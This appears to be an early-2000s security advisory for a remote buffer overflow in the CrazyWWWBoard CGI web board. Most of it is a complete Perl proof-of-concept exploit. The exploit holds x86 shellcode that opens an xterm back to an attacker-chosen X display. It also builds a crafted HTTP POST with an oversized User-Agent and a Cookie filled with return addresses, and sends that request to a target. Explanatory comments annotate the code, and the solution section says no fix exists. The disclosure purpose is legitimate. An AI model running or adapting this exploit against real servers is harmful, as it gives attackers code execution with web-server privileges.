COMMAND

    CrazyWWWBoard

SYSTEMS AFFECTED

    CrazyWWWBoard

PROBLEM

    'teleh0r' found the following.  He has discovered a buffer overflow
    in CrazyWWWBoard Full Edition and CrazyWWWBoard Limited Edition.  This
    is NOT the same overflow as the one discovered by Jin Ho You:

        http://oliver.efri.hr/~crv/security/bugs/Others/cwb.html

    This overflow will allow for arbitrary code execution with the
    privileges of the web server.  The versions which have been tested
    are: CrazyWWWBoard2000p4 for RedHat 6.0 and CrazyWWWBoard2000LEp5 for
    RedHat 6.1.

    Proof of Concept exploit:

    #!/usr/bin/perl
    
    # | Remote buffer overflow exploit for CrazyWWWBoard
    # | Nobreak Technologies - www.crazywwwboard.com/
    # | Copyright (c) 2001 by <teleh0r@doglover.com>
    # | All rights reserved.
    # |
    # | http://www.digit-labs.org/
    # | Usage: $0 -t target -a attacker -d dpy -o offset
    
    # NOTE(review): the script runs without `use strict; use warnings;`, so
    # every variable below ($target, $offset, $buffer, $egg, %args, ...) is
    # a package global and an unset $offset numifies to 0 silently in the
    # address calculation further down.
    use Getopt::Std; getopts('t:a:d:o:', \%args);
    use Socket;
    
    # Copy each option that was supplied; anything not supplied stays undef.
    # Only -t, -a and -d are validated by the usage check below; -o is not.
    if (defined($args{'t'})) { $target   = $args{'t'}; }
    if (defined($args{'a'})) { $attacker = $args{'a'}; }
    if (defined($args{'d'})) { $dpy      = $args{'d'}; }
    if (defined($args{'o'})) { $offset   = $args{'o'}; }
    
    # Payload as published (attribution on the next line). The -a and -d
    # values are interpolated into its tail, so the payload length -- and
    # with it the amount of 'A' padding computed in the $egg loop -- varies
    # with those two arguments; the total $egg size stays $egglen.
    $shellcode = # RaiSe <raise@undersec.com>
    "\xeb\x4f\x5e\x31\xd2\x88\x56\x14\x88\x56\x18\x88\x56".
    "\x21\xb2\x2b\x31\xc9\xb1\x09\x80\x3c\x32\x4b\x74\x05".
    "\x42\xe2\xf7\xeb\x2b\x88\x34\x32\x31\xd2\x89\xf3\x89".
    "\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d\x7e\x19\x89\x7e".
    "\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e\x36".
    "\x8d\x56\x46\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8".
    "\x40\xcd\x80\xe8\xac\xff\xff\xff/usr/X11R6/bin/xterm".
    "8-ut8-display8${attacker}:${dpy}K";
    
    # Remember to allow $target to connect to your X by
    # using xhost + $target.
    
    # Hard-coded, environment-specific layout values: a fixed stack address
    # plus two sizes, tested only against the RedHat 6.0/6.1 builds named in
    # the advisory. Nothing here is derived at runtime; -o merely shifts
    # $return by a constant.
    $return = 0xbffff2d8;
    $length = 324;    # bytes of repeated address placed in the Cookie header
    $egglen = 5000;   # total bytes (padding + payload) placed in User-Agent
    
    # Usage check. defined() is applied to the *result* of the && chain, i.e.
    # the first false operand: undef when an option is missing (dies), but a
    # defined empty string for e.g. `-t ""` (passes). $offset is not checked
    # at all, so omitting -o quietly uses an offset of 0.
    if (!(defined($target && $attacker && $dpy))) {
        die("Usage: $0 -t \"target\" -a \"attacker\" -d \"dpy\"\n");
    }
    
    # Print the chosen address in hex, then pack it as a 32-bit signed
    # integer in the host's native byte order. Because the payload above is
    # x86 code, the packed bytes are only laid out as intended when this
    # script itself runs on a little-endian host.
    print("Address: 0x", sprintf('%lx', ($return + $offset)), "\n");
    $new_ret = pack('l', ($return + $offset));
    
    # $buffer = $length/4 copies of the packed address (324 is a multiple of
    # 4, so exactly 81 copies, 324 bytes).
    for ($i = 0; $i < $length; $i += 4) {
        $buffer .= $new_ret;
    }
    
    # Pad $egg with 'A' up to ($egglen - payload size), then append the
    # payload, so $egg is exactly $egglen bytes whenever the payload fits.
    for ($i = 0; $i < ($egglen - length($shellcode)); $i++) {
        $egg .= 'A';
    }
    
    $egg .= $shellcode;
    
    # The raw HTTP request, built as one multi-line literal. Points a reader
    # should notice: header lines end in bare LF (only the terminator that
    # send() appends is CRLF); Content-length: 55 equals the form body
    # length exactly, so that final CRLF lies outside the declared body; and
    # as reproduced in this advisory each line of the literal also carries
    # the listing's four-space indent, which the original script presumably
    # lacked. From the defender's side, a ~5000-byte User-Agent and a Cookie
    # value made of one 4-byte pattern repeated are the observable signature
    # of this request in access logs or on the wire.
    $exploit =
    "POST /cgi-bin/CrazyWWWBoard.cgi HTTP/1.1
    User-Agent: $egg
    Host: localhost
    Accept: text/html, image/png, image/jpeg, image/gif
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Referer: http://teleh0r.cjb.net/
    Cookie: ID=gadmin; ASC=$buffer
    Connection: Keep-Alive, TE
    TE: deflate, gzip, chunked, identity, trailers
    Content-type: application/x-www-form-urlencoded
    Content-length: 55
    
    mode=center&ftype=6&backdepth=1&ID=gadmin&PASSWORD=0000";
    
    # Resolve -t (inet_aton accepts a hostname or dotted quad), build the
    # port-80 address and look up TCP. `|| die` is safe here only because
    # each left-hand call is fully parenthesised.
    $iaddr = inet_aton($target)                  || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr)             || die("Error: $!\n");
    $proto = getprotobyname('tcp')               || die("Error: $!\n");
    
    # Connect, send the request once with a trailing CRLF, and close. SOCKET
    # is a bareword (global) filehandle, the server's response is never
    # read, and the close() result is not checked.
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    send(SOCKET,"$exploit\015\012", 0)           || die("Error: $!\n");
    close(SOCKET);

SOLUTION

    Nothing yet.